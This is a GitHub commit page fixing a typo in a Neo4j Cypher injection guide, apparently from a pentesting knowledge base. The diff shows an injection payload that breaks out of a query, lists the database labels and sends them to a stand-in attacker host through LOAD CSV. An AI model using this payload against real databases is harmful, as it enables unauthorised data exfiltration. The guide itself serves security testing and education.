fix a missing space in a cypher-injection payload

fix a missing space in url in cypher-injection-neo4j.md
This commit is contained in:
KeoOp 2023-04-27 11:24:52 +08:00 committed by GitHub
parent 379f9c450b
commit f034eb35f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 1 deletions

View File

@ -125,7 +125,7 @@ Using the built-in method **`db.labels`**, it is possible to list all existing l
{% code overflow="wrap" %}
```sql
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip/?l='+label as l RETURN 0 as _0
```
{% endcode %}